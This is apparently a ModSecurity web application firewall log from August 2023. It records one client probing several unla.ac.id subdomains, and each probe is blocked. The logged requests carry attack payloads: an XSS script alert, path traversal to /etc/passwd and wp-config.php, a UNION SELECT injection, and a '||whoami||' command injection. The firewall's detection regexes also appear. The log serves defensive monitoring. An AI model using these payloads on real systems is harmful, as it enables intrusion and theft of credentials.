[Tue Aug 29 11:42:06.479818 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdTA@gAAAAY"]
[Tue Aug 29 11:42:07.413511 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdTA@kAAAAY"]
[Tue Aug 29 11:42:07.427438 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdcs8IAAAAC"]
[Tue Aug 29 11:42:07.444911 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAcuUncAAAAI"]
[Tue Aug 29 11:42:07.483407 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAc36y8AAAAO"]
[Tue Aug 29 11:42:07.549148 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAc-5zEAAAAN"]
[Tue Aug 29 11:42:07.580972 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13H8Co-f0AAAbo-aQAAAAi"]
[Tue Aug 29 11:42:07.672365 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAcuUngAAAAI"]
[Tue Aug 29 11:42:07.673188 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAc36zEAAAAO"]
[Tue Aug 29 11:42:07.707596 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAdUcy8AAAAZ"]
[Tue Aug 29 11:42:07.707775 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAdYA-8AAAAe"]
[Tue Aug 29 11:42:08.354661 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13IMCo-f0AAAdQ3eYAAAAV"]
[Tue Aug 29 11:42:08.364483 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAdV7ZEAAAAa"]
[Tue Aug 29 11:42:08.366811 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAcoNg0AAAAF"]
[Tue Aug 29 11:42:08.366884 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAdPLxoAAAAT"]
[Tue Aug 29 11:42:08.368115 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAdYBAAAAAAe"]
[Tue Aug 29 11:42:08.380153 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAdZZo8AAAAf"]
[Tue Aug 29 11:42:08.391741 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAc@cWUAAAAL"]
[Tue Aug 29 11:42:08.409593 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAdcs8QAAAAC"]
[Tue Aug 29 11:42:08.437648 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAddJqAAAAAh"]
[Tue Aug 29 11:42:08.442258 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAcsLFUAAAAE"]
[Tue Aug 29 11:42:09.356683 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IcCo-f0AAAdcs8YAAAAC"]
[Tue Aug 29 11:42:09.364182 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13IcCo-f0AAAdaZNYAAAAM"]
[Tue Aug 29 11:42:09.388390 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdb7h0AAAAb"]
[Tue Aug 29 11:42:09.389021 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdKXNAAAAAK"]
[Tue Aug 29 11:42:09.390849 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IcCo-f0AAAcrilgAAAAB"]
[Tue Aug 29 11:42:09.401940 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAc-5zYAAAAN"]
[Tue Aug 29 11:42:09.403704 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAc92wAAAAAD"]
[Tue Aug 29 11:42:09.408781 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdUczUAAAAZ"]
[Tue Aug 29 11:42:10.386576 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IsCo-f0AAAdZZpIAAAAf"]
[Tue Aug 29 11:42:10.388063 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IsCo-f0AAAc36zkAAAAO"]
